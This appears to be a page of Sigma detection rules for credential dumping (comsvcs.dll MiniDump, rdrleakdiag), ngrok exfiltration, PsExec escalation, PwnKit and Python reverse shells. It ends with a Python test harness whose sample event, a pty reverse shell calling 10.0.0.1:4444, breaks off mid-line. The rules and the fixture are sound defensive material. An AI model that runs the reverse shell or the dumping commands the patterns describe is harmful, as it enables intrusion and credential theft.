Process Explorer Driver Creation By Non-Sysinternals Binary
Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. Hack tools or malware may use the Process Explorer driver to elevate privileges: drop it to disk for a few moments, run a service using that driver and remove it afterwards.
Status: test · Author: Florian Roth (Nextron Systems) · ATT&CK: technique · Rule id: de46c52b-0bf8-4936-a327-aace94f94ac6
Sigma YAML:
title: Process Explorer Driver Creation By Non-Sysinternals Binary
id: de46c52b-0bf8-4936-a327-aace94f94ac6
status: test
description: |
    Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.
    Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
references:
    - https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer
    - https://github.com/Yaxser/Backstab
    - https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks
    - https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/
author: Florian Roth (Nextron Systems)
date: 2023-05-05
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1068
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|contains: '\PROCEXP'
        TargetFilename|endswith: '.sys'
    filter_main_process_explorer:
        Image|endswith:
            - '\procexp.exe'
            - '\procexp64.exe'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Some false positives may occur with legitimate renamed process explorer binaries
level: high
Process Initiated Network Connection To Ngrok Domain
Level: high · Quality: Strong · Alert volume: Medium FP
Detects an executable initiating a network connection to "ngrok" domains. Attackers have been seen using ngrok to host their second-stage payloads and malware. While communication with such domains can be legitimate, it is often a sign of either data exfiltration by malicious actors or of additional payload downloads.
Status: test · Author: Florian Roth (Nextron Systems) · ATT&CK mapping: technique · Rule id: 18249279-932f-45e2-b37a-8925f2597670
Sigma YAML:
title: Process Initiated Network Connection To Ngrok Domain
id: 18249279-932f-45e2-b37a-8925f2597670
related:
    - id: 1d08ac94-400d-4469-a82f-daee9a908849
      type: similar
status: test
description: |
    Detects an executable initiating a network connection to "ngrok" domains.
    Attackers were seen using this "ngrok" in order to store their second stage payloads and malware.
    While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
references:
    - https://ngrok.com/
    - https://ngrok.com/blog-post/new-ngrok-domains
    - https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/
    - https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf
author: Florian Roth (Nextron Systems)
date: 2022-07-16
modified: 2025-07-30
tags:
    - attack.exfiltration
    - attack.command-and-control
    - attack.t1567
    - attack.t1572
    - attack.t1102
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Initiated: 'true'
        DestinationHostname|endswith:
            - '.ngrok-free.app'
            - '.ngrok-free.dev'
            - '.ngrok.app'
            - '.ngrok.dev'
            - '.ngrok.io'
    condition: selection
falsepositives:
    - Legitimate use of the ngrok service.
# Note: The level of this rule is related to your internal policy.
level: high
Process Memory Dump Via Comsvcs.DLL
Level: high · Quality: Strong · Alert volume: Medium FP
Detects a process memory dump via "comsvcs.dll" using rundll32, covering several different invocation techniques (ordinal, MiniDump function name, etc.).
Status: test · Author: Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) · ATT&CK mapping: sub-technique · Rule id: 646ea171-dded-4578-8a4d-65e9822892e3
Sigma YAML:
title: Process Memory Dump Via Comsvcs.DLL
id: 646ea171-dded-4578-8a4d-65e9822892e3
related:
    - id: 09e6d5c0-05b8-4ff8-9eeb-043046ec774c
      type: obsolete
status: test
description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)
references:
    - https://twitter.com/shantanukhande/status/1229348874298388484
    - https://twitter.com/pythonresponder/status/1385064506049630211?s=21
    - https://twitter.com/Hexacorn/status/1224848930795552769
    - https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
    - https://twitter.com/SBousseaden/status/1167417096374050817
    - https://twitter.com/Wietze/status/1542107456507203586
    - https://github.com/Hackndo/lsassy/blob/14d8f8ae596ecf22b449bfe919829173b8a07635/lsassy/dumpmethod/comsvcs.py
    - https://www.youtube.com/watch?v=52tAmVLg1KM&t=2070s
author: Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2020-02-18
modified: 2025-02-23
tags:
    - attack.credential-access
    - attack.stealth
    - attack.t1036
    - attack.t1003.001
    - car.2013-05-009
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\rundll32.exe'
        - OriginalFileName: 'RUNDLL32.EXE'
        - CommandLine|contains: 'rundll32'
    selection_cli_1:
        CommandLine|contains|all:
            - 'comsvcs'
            - 'full'
        CommandLine|contains:
            - '#-'
            - '#+'
            - '#24'
            - '24 '
            - 'MiniDump' # Matches MiniDump and MinidumpW
            - '#65560' # ordinal is 16 bit ordinal, so if you make the number large enough (don't fit in 16 bit space), then it normally wraps around.  for e.g ordinal 24 can be also represented by 65560 (65536+24)
    selection_generic:
        CommandLine|contains|all:
            - '24'
            - 'comsvcs'
            - 'full'
        CommandLine|contains:
            - ' #'
            - ',#'
            - ', #'
            - '"#'
    condition: (selection_img and 1 of selection_cli_*) or selection_generic
falsepositives:
    - Unlikely
level: high
Process Memory Dump via RdrLeakDiag.EXE
Level: high · Quality: Strong · Alert volume: Medium FP
Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory.
Status: test · Author: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: sub-technique · Rule id: edadb1e5-5919-4e4c-8462-a9e643b02c4b
Sigma YAML:
title: Process Memory Dump via RdrLeakDiag.EXE
id: edadb1e5-5919-4e4c-8462-a9e643b02c4b
related:
    - id: 6355a919-2e97-4285-a673-74645566340d
      type: obsolete
status: test
description: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory
references:
    - https://www.pureid.io/dumping-abusing-windows-credentials-part-1/
    - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/
    - https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/
    - https://twitter.com/0gtweet/status/1299071304805560321?s=21
    - https://news.sophos.com/en-us/2024/06/05/operation-crimson-palace-a-technical-deep-dive
author: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
date: 2021-09-24
modified: 2024-08-15
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\rdrleakdiag.exe'
        - OriginalFileName: RdrLeakDiag.exe
    selection_cli_dump:
        CommandLine|contains|windash:
            - '/memdmp'
            - 'fullmemdmp'
    selection_cli_output_process:
        CommandLine|contains|windash:
            - ' /o ' # Output
            - ' /p ' # Process
    condition: all of selection_*
falsepositives:
    - Unlikely
level: high
ProcessHacker Privilege Elevation
Level: high · Quality: Moderate · Alert volume: Low FP
Detects the ProcessHacker tool elevating its privileges to a very high level (installation of a ProcessHacker service running as LocalSystem).
Status: test · Author: Florian Roth (Nextron Systems) · ATT&CK mapping: sub-technique · Rule id: c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9
Sigma YAML:
title: ProcessHacker Privilege Elevation
id: c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9
status: test
description: Detects a ProcessHacker tool that elevated privileges to a very high level
references:
    - https://twitter.com/1kwpeter/status/1397816101455765504
author: Florian Roth (Nextron Systems)
date: 2021-05-27
modified: 2022-12-25
tags:
    - attack.persistence
    - attack.execution
    - attack.privilege-escalation
    - attack.t1543.003
    - attack.t1569.002
logsource:
    product: windows
    service: system
detection:
    selection:
        Provider_Name: 'Service Control Manager'
        EventID: 7045
        ServiceName|startswith: 'ProcessHacker'
        AccountName: 'LocalSystem'
    condition: selection
falsepositives:
    - Unlikely
level: high
Protected Storage Service Access
Level: high · Quality: Moderate · Alert volume: Medium FP
Detects access to the protected_storage service over the network, a potential abuse of DPAPI to extract domain backup keys from Domain Controllers.
Status: test · Author: Roberto Rodriguez @Cyb3rWard0g · ATT&CK mapping: sub-technique · Rule id: 45545954-4016-43c6-855e-eae8f1c369dc
Sigma YAML:
title: Protected Storage Service Access
id: 45545954-4016-43c6-855e-eae8f1c369dc
status: test
description: Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers
references:
    - https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html
author: Roberto Rodriguez @Cyb3rWard0g
date: 2019-08-10
modified: 2021-11-27
tags:
    - attack.lateral-movement
    - attack.t1021.002
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 5145
        ShareName|contains: 'IPC'
        RelativeTargetName: 'protected_storage'
    condition: selection
falsepositives:
    - Unknown
level: high
Proxy Execution Via Wuauclt.EXE
Level: high · Quality: Strong · Alert volume: Medium FP
Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.
Status: test · Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team · ATT&CK mapping: technique · Rule id: af77cf95-c469-471c-b6a0-946c685c4798
Sigma YAML:
title: Proxy Execution Via Wuauclt.EXE
id: af77cf95-c469-471c-b6a0-946c685c4798
related:
    - id: ba1bb0cb-73da-42de-ad3a-de10c643a5d0
      type: obsolete
    - id: d7825193-b70a-48a4-b992-8b5b3015cc11
      type: obsolete
status: test
description: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.
references:
    - https://dtm.uk/wuauclt/
    - https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team
date: 2020-10-12
modified: 2023-11-11
tags:
    - attack.stealth
    - attack.t1218
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\wuauclt.exe'
        - OriginalFileName: 'wuauclt.exe'
    selection_cli:
        CommandLine|contains|all:
            - 'UpdateDeploymentProvider'
            - 'RunHandlerComServer'
    filter_main_generic:
        # Note: Please enhance this if you find the full path
        CommandLine|contains: ' /UpdateDeploymentProvider UpdateDeploymentProvider.dll '
    filter_main_wuaueng:
        # Note: Please enhance this if you find the full path
        CommandLine|contains: ' wuaueng.dll '
    filter_main_uus:
        CommandLine|contains:
            - ':\Windows\UUS\Packages\Preview\amd64\updatedeploy.dll /ClassId'
            - ':\Windows\UUS\amd64\UpdateDeploy.dll /ClassId'
    filter_main_winsxs:
        CommandLine|contains|all:
            - ':\Windows\WinSxS\'
            - '\UpdateDeploy.dll /ClassId '
    condition: all of selection_* and not 1 of filter_main_*
falsepositives:
    - Unknown
level: high
Ps.exe Renamed SysInternals Tool
Level: high · Quality: Moderate · Alert volume: High FP
Detects execution of a renamed SysInternals tool with a binary named ps.exe, as used by the Dragonfly APT group and documented in the TA17-293A report.
Status: test · Author: Florian Roth (Nextron Systems) · ATT&CK mapping: sub-technique · Rule id: 18da1007-3f26-470f-875d-f77faf1cab31
Sigma YAML:
title: Ps.exe Renamed SysInternals Tool
id: 18da1007-3f26-470f-875d-f77faf1cab31
status: test
description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
references:
    - https://www.us-cert.gov/ncas/alerts/TA17-293A
author: Florian Roth (Nextron Systems)
date: 2017-10-22
modified: 2023-05-02
tags:
    - attack.stealth
    - attack.g0035
    - attack.t1036.003
    - car.2013-05-009
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'ps.exe -accepteula'
            - '-s cmd /c netstat'
    condition: selection
falsepositives:
    - Renamed SysInternals tool
level: high
PsExec Service Child Process Execution as LOCAL SYSTEM
Level: high · Quality: Strong · Alert volume: Medium FP
Detects a suspicious launch of the PSEXESVC service on this system with a sub-process run as LOCAL_SYSTEM (-s). This means that someone remotely started a command on this system with the highest privileges, rather than only the privileges of the logged-in user account (e.g. the administrator account).
Status: test · Author: Florian Roth (Nextron Systems) · ATT&CK mapping: tactic-only · Rule id: 7c0dcd3d-acf8-4f71-9570-f448b0034f94
Sigma YAML:
title: PsExec Service Child Process Execution as LOCAL SYSTEM
id: 7c0dcd3d-acf8-4f71-9570-f448b0034f94
related:
    - id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba
      type: similar
status: test
description: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)
references:
    - https://learn.microsoft.com/en-us/sysinternals/downloads/psexec
author: Florian Roth (Nextron Systems)
date: 2022-07-21
modified: 2023-02-28
tags:
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage: 'C:\Windows\PSEXESVC.exe'
        User|contains: # covers many language settings
            - 'AUTHORI'
            - 'AUTORI'
    condition: selection
falsepositives:
    - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension
level: high
PsExec/PAExec Escalation to LOCAL SYSTEM
Level: high · Quality: Strong · Alert volume: High FP
Detects suspicious command-line flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights.
Status: test · Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: sub-technique · Rule id: 8834e2f7-6b4b-4f09-8906-d2276470ee23
Sigma YAML:
title: PsExec/PAExec Escalation to LOCAL SYSTEM
id: 8834e2f7-6b4b-4f09-8906-d2276470ee23
related:
    - id: 207b0396-3689-42d9-8399-4222658efc99 # Generic rule based on similar cli flags
      type: similar
status: test
description: Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights
references:
    - https://learn.microsoft.com/en-us/sysinternals/downloads/psexec
    - https://www.poweradmin.com/paexec/
    - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2021-11-23
modified: 2024-03-05
tags:
    - attack.resource-development
    - attack.t1587.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_sys: # Escalation to LOCAL_SYSTEM
        CommandLine|contains|windash:
            # Note that you don't need to add the ".exe" part when using psexec/paexec
            # The "-" can also be replaced with "/"
            # The order of args isn't important
            # "cmd" can be replaced by "powershell", "pwsh" or any other console like software
            - ' -s cmd'
            - ' -s -i cmd'
            - ' -i -s cmd'
            # Pwsh (For PowerShell 7)
            - ' -s pwsh'
            - ' -s -i pwsh'
            - ' -i -s pwsh'
            # PowerShell (For PowerShell 5)
            - ' -s powershell'
            - ' -s -i powershell'
            - ' -i -s powershell'
    selection_other:
        CommandLine|contains:
            - 'psexec'
            - 'paexec'
            - 'accepteula'
    condition: all of selection_*
falsepositives:
    - Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)
    - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension
level: high
Publicly Accessible RDP Service
Level: high · Quality: Moderate · Alert volume: Medium FP
Detects connections from routable IPs to an RDP listener, which is indicative of a publicly accessible RDP service.
Status: test · Author: Josh Brower @DefensiveDepth · ATT&CK mapping: sub-technique · Rule id: 1fc0809e-06bf-4de3-ad52-25e5263b7623
Sigma YAML:
title: Publicly Accessible RDP Service
id: 1fc0809e-06bf-4de3-ad52-25e5263b7623
status: test
description: |
    Detects connections from routable IPs to an RDP listener. Which is indicative of a publicly-accessible RDP service.
author: Josh Brower @DefensiveDepth
date: 2020-08-22
modified: 2024-03-13
tags:
    - attack.lateral-movement
    - attack.t1021.001
logsource:
    product: zeek
    service: rdp
detection:
    selection:
        id.orig_h|cidr:
            - '::1/128'  # IPv6 loopback
            - '10.0.0.0/8'
            - '127.0.0.0/8'
            - '172.16.0.0/12'
            - '192.168.0.0/16'
            - '169.254.0.0/16'
            - '2620:83:8000::/48'
            - 'fc00::/7'  # IPv6 private addresses
            - 'fe80::/10'  # IPv6 link-local addresses
    # approved_rdp:
      # dst_ip:
        # - x.x.x.x
    condition: not selection # and not approved_rdp
falsepositives:
    - Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet.
level: high
Pulse Connect Secure RCE Attack CVE-2021-22893
Level: high · Quality: Strong · Alert volume: High FP
Detects exploitation attempts against the Pulse Connect Secure (PCS) vulnerability CVE-2021-22893.
Status: stable · Author: Sittikorn S · ATT&CK mapping: technique · Rule id: 5525edac-f599-4bfd-b926-3fa69860e766
Sigma YAML:
title: Pulse Connect Secure RCE Attack CVE-2021-22893
id: 5525edac-f599-4bfd-b926-3fa69860e766
status: stable
description: This rule detects exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893)
references:
    - https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html
    - https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784
author: Sittikorn S
date: 2021-06-29
modified: 2023-01-02
tags:
    - attack.initial-access
    - attack.t1190
    - cve.2021-22893
    - detection.emerging-threats
logsource:
    category: webserver
detection:
    selection1:
        cs-uri-query|contains:
            - '/dana-na/auth/'
            - '/dana-ws/'
            - '/dana-cached/'
    selection2:
        cs-uri-query|contains:
            - '?id='
            - '?token='
            - 'Secid_canceltoken.cgi'
            - 'CGI::param'
            - 'meeting'
            - 'smb'
            - 'namedusers'
            - 'metric'
    condition: all of selection*
falsepositives:
    - Vulnerability Scanning
level: high
PwnKit Local Privilege Escalation
Level: high · Quality: Moderate · Alert volume: High FP
Detects potential PwnKit (CVE-2021-4034) exploitation in auth logs.
Status: test · Author: Sreeman · ATT&CK mapping: sub-technique · Rule id: 0506a799-698b-43b4-85a1-ac4c84c720e9
Sigma YAML:
title: PwnKit Local Privilege Escalation
id: 0506a799-698b-43b4-85a1-ac4c84c720e9
status: test
description: Detects potential PwnKit exploitation CVE-2021-4034 in auth logs
references:
    - https://twitter.com/wdormann/status/1486161836961579020
author: Sreeman
date: 2022-01-26
modified: 2024-09-11
tags:
    - attack.privilege-escalation
    - attack.t1548.001
    - detection.emerging-threats
    - cve.2021-4034
logsource:
    product: linux
    service: auth
detection:
    keywords:
        '|all':
            - 'pkexec'
            - 'The value for environment variable XAUTHORITY contains suspicious content'
            - '[USER=root] [TTY=/dev/pts/0]'
    condition: keywords
falsepositives:
    - Unknown
level: high
Python Function Execution Security Warning Disabled In Excel
Level: high · Quality: Moderate · Alert volume: High FP
Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
Status: test · Author: @Kostastsale · ATT&CK mapping: technique · Rule id: 023c654f-8f16-44d9-bb2b-00ff36a62af9
Sigma YAML:
title: Python Function Execution Security Warning Disabled In Excel
id: 023c654f-8f16-44d9-bb2b-00ff36a62af9
related:
    - id: 17e53739-a1fc-4a62-b1b9-87711c2d5e44
      type: similar
status: test
description: |
    Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed.
    Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
references:
    - https://support.microsoft.com/en-us/office/data-security-and-python-in-excel-33cc88a4-4a87-485e-9ff9-f35958278327
author: '@Kostastsale'
date: 2023-08-22
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - '\Microsoft\Office\'
            - '\Excel\Security'
            - 'PythonFunctionWarnings'
        CommandLine|contains: ' 0'
    condition: selection
falsepositives:
    - Unknown
level: high
Python Function Execution Security Warning Disabled In Excel - Registry
Level: high · Quality: Moderate · Alert volume: Medium FP
Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
Status: test · Author: Nasreddine Bencherchali (Nextron Systems), @Kostastsale · ATT&CK mapping: technique · Rule id: 17e53739-a1fc-4a62-b1b9-87711c2d5e44
Sigma YAML:
title: Python Function Execution Security Warning Disabled In Excel - Registry
id: 17e53739-a1fc-4a62-b1b9-87711c2d5e44
related:
    - id: 023c654f-8f16-44d9-bb2b-00ff36a62af9
      type: similar
status: test
description: |
    Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed.
    Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
references:
    - https://support.microsoft.com/en-us/office/data-security-and-python-in-excel-33cc88a4-4a87-485e-9ff9-f35958278327
author: Nasreddine Bencherchali (Nextron Systems), @Kostastsale
date: 2024-08-23
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: '\Microsoft\Office\'
        TargetObject|endswith: '\Excel\Security\PythonFunctionWarnings'
        Details: 'DWORD (0x00000001)'
    condition: selection
falsepositives:
    - Unknown
level: high
Python One-Liners with Base64 Decoding
Level: high · Quality: Moderate · Alert volume: High FP
Detects Python one-liners that use base64 decoding functions in command-line executions. Malicious scripts or attackers often use Python one-liners to decode and execute base64-encoded payloads, a common technique for obfuscation and evasion.
Status: experimental · Author: Hugh Ryan (HueCodes), Swachchhanda Shrawan Poudel (Nextron Systems) · ATT&CK mapping: sub-technique · Rule id: 50a0aa3d-ab16-4594-a8aa-5145a6e6792b
Sigma YAML:
title: Python One-Liners with Base64 Decoding
id: 50a0aa3d-ab16-4594-a8aa-5145a6e6792b
related:
    - id: 55e862a8-dd9c-4651-807a-f21fcad56716
      type: similar
status: experimental
description: |
    Detects Python one-liners that use base64 decoding functions in command line executions.
    Malicious scripts or attackers often use python one-liners to decode and execute base64-encoded payloads, which is a common technique for obfuscation and evasion.
references:
    - https://docs.python.org/3/library/base64.html
    - https://www.virustotal.com/gui/file/bc43e925d7b4b74319f6e74e836a96f1997ba404e14ac566cf12a21e9da463db/behavior
    - https://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites
author: Hugh Ryan (HueCodes), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-03-09
tags:
    - attack.execution
    - attack.stealth
    - attack.t1059.006
    - attack.t1027.010
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|contains: '\python'
        - OriginalFileName|contains: 'python'
    selection_cli:
        CommandLine|contains|all:
            - 'import'
            - 'base64'
            - ' -c'
        CommandLine|contains:
            - '.decode'
            - 'b16decode'
            - 'b32decode'
            - 'b32hexdecode'
            - 'b64decode'
            - 'b85decode'
            - 'z85decode'
    condition: all of selection_*
falsepositives:
    - Legitimate use of Python for decoding data, which is uncommon in typical enterprise environments but possible in development or data analysis contexts.
level: high
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_python_base64_encoded_execution/info.yml
Python One-Liners with Base64 Decoding - Linux
Level: high · Quality: Strong · Alert volume: Medium FP
Detects the use of Python's base64 decoding functions in command-line executions on Linux systems. Malicious scripts often use Python one-liners to decode and execute base64-encoded payloads, a common technique for obfuscation and evasion.
Status: experimental · Author: Hugh Ryan (HueCodes), Swachchhanda Shrawan Poudel (Nextron Systems) · ATT&CK mapping: sub-technique · Rule id: 55e862a8-dd9c-4651-807a-f21fcad56716
Sigma YAML:
title: Python One-Liners with Base64 Decoding - Linux
id: 55e862a8-dd9c-4651-807a-f21fcad56716
related:
    - id: 50a0aa3d-ab16-4594-a8aa-5145a6e6792b
      type: similar
status: experimental
description: |
    Detects the use of Python's base64 decoding functions in command line executions on Linux systems.
    Malicious scripts often use python one-liners to decode and execute base64-encoded payloads, which is a common technique for obfuscation and evasion.
references:
    - https://docs.python.org/3/library/base64.html
    - https://www.virustotal.com/gui/file/bc43e925d7b4b74319f6e74e836a96f1997ba404e14ac566cf12a21e9da463db/behavior
    - https://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites
author: Hugh Ryan (HueCodes), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-03-09
tags:
    - attack.execution
    - attack.stealth
    - attack.t1059.006
    - attack.t1027.010
logsource:
    category: process_creation
    product: linux
detection:
    selection_img:
        Image|contains: '/python'
    selection_cli:
        CommandLine|contains|all:
            - 'import'
            - 'base64'
            - ' -c'
        CommandLine|contains:
            - '.decode'
            - 'b16decode'
            - 'b32decode'
            - 'b32hexdecode'
            - 'b64decode'
            - 'b85decode'
            - 'z85decode'
    condition: all of selection_*
falsepositives:
    - Legitimate use of Python for decoding data, which is uncommon in typical enterprise environments but possible in development or data analysis contexts.
level: high
Python Reverse Shell Execution Via PTY And Socket Modules
Level: high · Quality: Moderate · Alert volume: High FP
Detects the execution of Python with calls to the socket and pty modules in order to connect out and spawn a potential reverse shell.
Status: test · Author: @d4ns4n_, Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: tactic-only · Rule id: 32e62bc7-3de0-4bb1-90af-532978fe42c0
Sigma YAML:
title: Python Reverse Shell Execution Via PTY And Socket Modules
id: 32e62bc7-3de0-4bb1-90af-532978fe42c0
related:
    - id: c4042d54-110d-45dd-a0e1-05c47822c937
      type: similar
status: test
description: |
    Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.
references:
    - https://www.revshells.com/
author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'
date: 2023-04-24
modified: 2024-11-04
tags:
    - attack.execution
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|contains: 'python'
        CommandLine|contains|all:
            - ' -c '
            - 'import'
            - 'pty'
            - 'socket'
            - 'spawn'
            - '.connect'
    condition: selection
falsepositives:
    - Unknown
level: high
Python Spawning Pretty TTY on Windows
Level: high · Quality: Moderate · Alert volume: Medium FP
Detects Python spawning a TTY via the pty module (a "pretty TTY").
Status: test · Author: Nextron Systems · ATT&CK mapping: technique · Rule id: 480e7e51-e797-47e3-8d72-ebfce65b6d8d
Sigma YAML:
title: Python Spawning Pretty TTY on Windows
id: 480e7e51-e797-47e3-8d72-ebfce65b6d8d
related:
    - id: 899133d5-4d7c-4a7f-94ee-27355c879d90
      type: derived
status: test
description: Detects python spawning a pretty tty
references:
    - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
author: Nextron Systems
date: 2022-06-03
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith:
            - 'python.exe' # no \ bc of e.g. ipython.exe
            - 'python3.exe'
            - 'python2.exe'
    selection_cli_1:
        CommandLine|contains|all:
            - 'import pty'
            - '.spawn('
    selection_cli_2:
        CommandLine|contains: 'from pty import spawn'
    condition: selection_img and 1 of selection_cli_*
falsepositives:
    - Unknown
level: high
Convert to SIEM query
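The two Python rules above (32e62bc7 for Linux, 480e7e51 for Windows) are simple enough to reproduce by hand, which is the quickest way to see what a `contains|all` list and a `1 of selection_cli_*` condition actually accept and reject. The block below is an added example written for this page, not SigmaHQ code or output of a Sigma backend; it implements both rules as plain predicates and runs them over constructed process_creation events. Sigma string matching is case-insensitive unless the `cased` modifier is used, so every comparison lower-cases both sides. The third Linux event is the same pty reverse shell written with `socket.create_connection()`, whose command line never contains the literal `.connect` and therefore slips past the six-substring rule.

```python
"""Sigma 32e62bc7 (Linux) and 480e7e51 (Windows) rewritten as plain Python
predicates and run over constructed process_creation events.
Added example for this page; not SigmaHQ code."""


def _s(value):
    # Sigma string matching is case-insensitive unless the 'cased' modifier
    # is used, so every comparison below works on lower-cased copies.
    return str(value or "").lower()


def contains_all(value, needles):
    """CommandLine|contains|all: every needle must be a substring."""
    haystack = _s(value)
    return all(_s(n) in haystack for n in needles)


def endswith_any(value, suffixes):
    """Image|endswith with a list: any suffix matches (implicit OR)."""
    haystack = _s(value)
    return any(haystack.endswith(_s(x)) for x in suffixes)


def linux_python_pty_revshell(event):
    """32e62bc7: Image|contains 'python' and six CommandLine substrings."""
    return "python" in _s(event.get("Image")) and contains_all(
        event.get("CommandLine"),
        [" -c ", "import", "pty", "socket", "spawn", ".connect"],
    )


def windows_python_pty_spawn(event):
    """480e7e51: selection_img and 1 of selection_cli_*."""
    cmd = event.get("CommandLine")
    selection_img = endswith_any(
        event.get("Image"), ["python.exe", "python3.exe", "python2.exe"]
    )
    selection_cli_1 = contains_all(cmd, ["import pty", ".spawn("])
    selection_cli_2 = "from pty import spawn" in _s(cmd)
    return selection_img and (selection_cli_1 or selection_cli_2)


# Constructed sample events (field names follow the Sigma taxonomy used by
# the rules above); they are not real telemetry.
LINUX_EVENTS = {
    # revshells.com-style pty reverse shell: hits all six substrings.
    "pty_revshell": {
        "Image": "/usr/bin/python3",
        "CommandLine": (
            "python3 -c 'import sys,socket,os,pty;s=socket.socket();"
            's.connect(("10.0.0.1",4444));'
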